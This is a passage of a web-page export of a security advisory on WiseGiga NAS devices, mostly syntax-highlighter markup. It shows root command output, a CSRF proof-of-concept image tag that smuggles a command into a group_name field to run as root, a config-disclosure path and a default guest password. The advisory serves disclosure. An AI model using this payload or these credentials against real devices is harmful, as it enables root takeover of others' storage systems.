margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> uid=0(root) gid=48(apache) groups=48(apache)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980593801537199-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980593801537199-1\"><span class=\"crayon-v\">uid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">groups<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p><strong>Remote Command Execution as root with CSRF<\/strong><br \/> There is no CSRF protection in WiseGiga NAS.<\/p>\n<p>An attacker can force the execution of a command as root when the victim visits the malicious website.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Once the victim visit the attacker&#8217;s website with the following code, the attacker can execute arbitrary commands.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980595996454211\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;img src=&#8221;http:\/\/192.168.1.1\/admin\/group.php?memberid=root&amp;cmd=add&amp;group_name=d;COMMANDTOEXECUTE&#8221;&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980595996454211-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980595996454211-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">img <\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;http:\/\/192.168.1.1\/admin\/group.php?memberid=root&amp;cmd=add&amp;group_name=d;COMMANDTOEXECUTE&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p><strong>InfoLeak<\/strong><br \/> accessing <em>http:\/\/IP\/webfolder\/config\/config.php<\/em>  will disclose the PHP configuration.<\/p>\n<p><strong>Default accounts<\/strong><br \/> Username: guest<br \/> Password: guest09#$<\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3402\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 05 Sep 2017 11:11:02 +0000<\/strong><\/p>\n<p>Vulnerabilities summary The following advisory describes five (5) vulnerabilities and default accounts \/ passwords found in WiseGiga NAS devices. WiseGiga is a Korean company selling NAS products. The vulnerabilities found in WiseGiga NAS are: Pre-Authentication Local File Inclusion (4 different vulnerabilities) Post-Authentication Local File Inclusion Remote Command Execution as root Remote Command Execution as root &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3402\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 WiseGiga NAS Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12135,14428,11851,10757,12136],"class_list":["post-9094","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-information-disclosure","tag-local-file-inclusion","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9094","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9094"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9094\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9094"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9094"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9094"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}